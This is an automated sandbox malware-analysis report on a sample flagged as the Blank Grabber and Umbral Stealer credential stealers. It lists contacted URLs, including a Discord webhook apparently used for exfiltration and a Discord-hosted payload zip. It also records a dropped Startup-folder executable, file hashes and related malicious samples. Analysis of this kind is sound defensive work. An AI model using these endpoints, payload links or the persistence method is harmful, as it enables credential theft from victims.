                            https://contoso.com/powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://docs.google.com/spreadsheets/:obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/?lfhs=2obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.comobvious.exe, 00000000.00000002.2327380876.0000012F61286000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F615E6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://oneget.orgXpowershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.youtube.com/s/notifications/manifest/cr_install.htmlobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameobvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BE9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.youtube.com/?feature=ytcaobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-obvious.exe, uGCIY.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.youtube.com/Jobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://discord.comobvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://discord.com/api/v10/users/uGCIY.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/:obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://media.discordapp.net/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?eobvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.discordapp.com/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?ex=obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://drive.google.com/Jobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Blank-c/Umbral-StealeruGCIY.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1748644652.000001E0A9A19000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://media.discordapp.net/attachments/1176050474064019486/12780529320964obvious.exe, 00000000.00000002.2327380876.0000012F61713000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/presentation/?usp=installed_webappobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQobvious.exe, 00000000.00000002.2327380876.0000012F6171A000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F6169F000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000005.00000002.1748644652.000001E0A97F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1788211352.00000223BEA3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BB93B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024920461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E205EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.com/json/?fields=225545Pobvious.exe, 00000000.00000002.2327380876.0000012F61605000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://docs.google.com/document/?usp=installed_webappobvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://oneget.orgpowershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ip-api.com/json/?fields=225545obvious.exe, uGCIY.scr.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microspowershell.exe, 00000005.00000002.1775176597.000001E0C1DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            		ip-api.comUnited States
                            		53334TUT-ASUStrue
                            162.159.136.232
                            		discord.comUnited States
                            		13335CLOUDFLARENETUStrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1500039
                            Start date and time:2024-08-27 20:04:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 39s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:32
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:obvious.exe
                            Detection:MAL
                            Classification:mal100.troj.adwa.spyw.evad.winEXE@39/23@3/2
                            EGA Information:
                            • Successful, ratio: 16.7%
                            HCA Information:
                            • Successful, ratio: 66%
                            • Number of executed functions: 265
                            • Number of non-executed functions: 19
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.186.35
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 7212 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 8012 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 8132 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: obvious.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            14:05:03API Interceptor5x Sleep call for process: WMIC.exe modified
                            14:05:05API Interceptor29x Sleep call for process: powershell.exe modified
                            14:05:06API Interceptor8109x Sleep call for process: obvious.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.1#U00d6deme Talebi_27.08.2024.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            memreduct.exeGet hashmaliciousBlank GrabberBrowse
                            • ip-api.com/json/?fields=225545
                            172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            cotizaci#U00f3n_SIS20240500007257.pdf.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
                            • ip-api.com/line/?fields=hosting
                            Fatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • ip-api.com/json/?fields=225545
                            smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                            • ip-api.com/json
                            RFQ20240513.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                            • ip-api.com/line/?fields=hosting
                            162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                            • discord.com/administrator/index.php

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            discord.comFatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 162.159.136.232
                            http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                            • 162.159.136.232
                            oBHZZU8EYd.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Umbral Stealer, zgRATBrowse
                            • 162.159.136.232
                            RebelCracked.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                            • 162.159.138.232
                            lol.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 162.159.138.232
                            cum.exeGet hashmaliciousBlank Grabber, Umbral Stealer, XWormBrowse
                            • 162.159.135.232
                            http://discord.openaiproxy.top/Get hashmaliciousUnknownBrowse
                            • 162.159.128.233
                            ExtremeInjectorV3.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 162.159.138.232
                            fkgDa.scr.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 162.159.137.232
                            rnZ46.scr.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 162.159.138.232
                            ip-api.com#U00d6deme Talebi_27.08.2024.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            Doc-Secure6025.pdfGet hashmaliciousUnknownBrowse
                            • 51.77.64.70
                            memreduct.exeGet hashmaliciousBlank GrabberBrowse
                            • 208.95.112.1
                            172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            cotizaci#U00f3n_SIS20240500007257.pdf.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
                            • 208.95.112.1
                            Fatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 208.95.112.1
                            smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                            • 208.95.112.1

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUSMadisonwellsmedia546.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 188.114.96.3
                            (No subject) (59).emlGet hashmaliciousHTMLPhisherBrowse
                            • 172.66.47.111
                            https://12dec6c2-3c78-e425-b87e-b20197f5da10.powerappsportals.com/Get hashmaliciousUnknownBrowse
                            • 104.21.20.188
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 188.114.96.3
                            file.exeGet hashmaliciousLummaC, VidarBrowse
                            • 188.114.96.3
                            https://t.co/CFNobJuJq9Get hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            http://esc-dot-wind-blade-416540.uk.r.appspot.comGet hashmaliciousHTMLPhisherBrowse
                            • 188.114.96.3
                            Status Update ECKY2.htmlGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 172.64.41.3
                            file.exeGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            TUT-ASUS#U00d6deme Talebi_27.08.2024.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            memreduct.exeGet hashmaliciousBlank GrabberBrowse
                            • 208.95.112.1
                            http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                            • 162.252.214.4
                            172473834493f9dd4c11e505629bd9b8efb5932f698a99acd495429ea8dcfe99effc6f3741352.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            RFQ448903423_MAT_HASUE_de_Mexico.jsGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            cotizaci#U00f3n_SIS20240500007257.pdf.exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            Recibo de env#U00edo de DHL_Gu#U00eda de embarque Doc_PRG211003417144356060.PDF..exeGet hashmaliciousAgentTeslaBrowse
                            • 208.95.112.1
                            Image Logger Installer.exeGet hashmaliciousAsyncRAT, XWormBrowse
                            • 208.95.112.1
                            Fatality.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                            • 208.95.112.1
                            smss.exeGet hashmaliciousRMSRemoteAdmin, RDPWrap Tool, xRATBrowse
                            • 208.95.112.1

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0ehttp://email.e.quickshipping.com/c/eJxszLFSxCAQgOGnId1lYHchWFDY5D042JOdXGJkg45v72ht-88_X03gYiw8cXILUIjBeze1RKEwBLTBu5CDj2gBGWPMD-I7P9wkCSyQjRCcRwKcq1uWSEzW40spdTFkef4YUjZtcp5yvM3lfZ-eqV3XqQZfDawG1jtv0ud8ZeUmfc8b99_PwPp13uQoz1FZDaydq3QulwHUPatmQ3a079vQP7an_-pngp8AAAD__zWIRVUGet hashmaliciousUnknownBrowse
                            • 162.159.136.232
                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 162.159.136.232
                            Statement of Account.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 162.159.136.232
                            Madisonwellsmedia546.pdfGet hashmaliciousUnknownBrowse
                            • 162.159.136.232
                            file.exeGet hashmaliciousRHADAMANTHYS, XWormBrowse
                            • 162.159.136.232
                            instruction_3.pdf lnk.lnkGet hashmaliciousLummaCBrowse
                            • 162.159.136.232
                            ATT09876.htmGet hashmaliciousHTMLPhisherBrowse
                            • 162.159.136.232
                            FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 162.159.136.232
                            Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exeGet hashmaliciousQuasarBrowse
                            • 162.159.136.232
                            #U00d6deme Talebi_27.08.2024.exeGet hashmaliciousAgentTeslaBrowse
                            • 162.159.136.232

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):235008
                            Entropy (8bit):6.052795731729376
                            Encrypted:false
                            SSDEEP:6144:lloZM+rIkd8g+EtXHkv/iD4Wn0IZHMgPou35EwFyov28e1mpi:noZtL+EP8Wn0IZHMgPou35EwFm1
                            MD5:EABE2A81AA3DABAB25E49EE4B36CE075
                            SHA1:F55B6298F0A8330D90D39E20A73ADB2E828DFD1C
                            SHA-256:5B97B5644019CEC44DDED172780F30B049B82C8E8582A589CE95D7DEC421A686
                            SHA-512:9688119150D3A466D9A12BFC55933D367104747A2CF319467A78DFCF975361C9E2727F76EFE380DB9D0C92C39DC4B0241BFB444E965E92720C9EDCF42C1D18FE
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, Author: Joe Security
                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, Author: ditekSHen
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 79%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.................. ........@.. ....................................`.................................<...O.......P........................... ................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......@...........6.....................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ... )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*...0..w.............%.o...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~...

                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr:Zone.Identifier

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:true
                            Preview:[ZoneTransfer]....ZoneId=0

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\obvious.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):1965
                            Entropy (8bit):5.377802142292312
                            Encrypted:false
                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                            MD5:582A844EB067319F705A5ADF155DBEB0
                            SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                            SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                            SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                            Malicious:true
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.34726597513537405
                            Encrypted:false
                            SSDEEP:3:Nlll:Nll
                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                            Malicious:false
                            Preview:@...e...........................................................

                            C:\Users\user\AppData\Local\Temp\KtE6mRAFZ5iEcgF

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):40960
                            Entropy (8bit):0.8553638852307782
                            Encrypted:false
                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                            MD5:28222628A3465C5F0D4B28F70F97F482
                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\VUku0KRjiZfWItk

                            Download File
                            Process:C:\Users\user\Desktop\obvious.exe
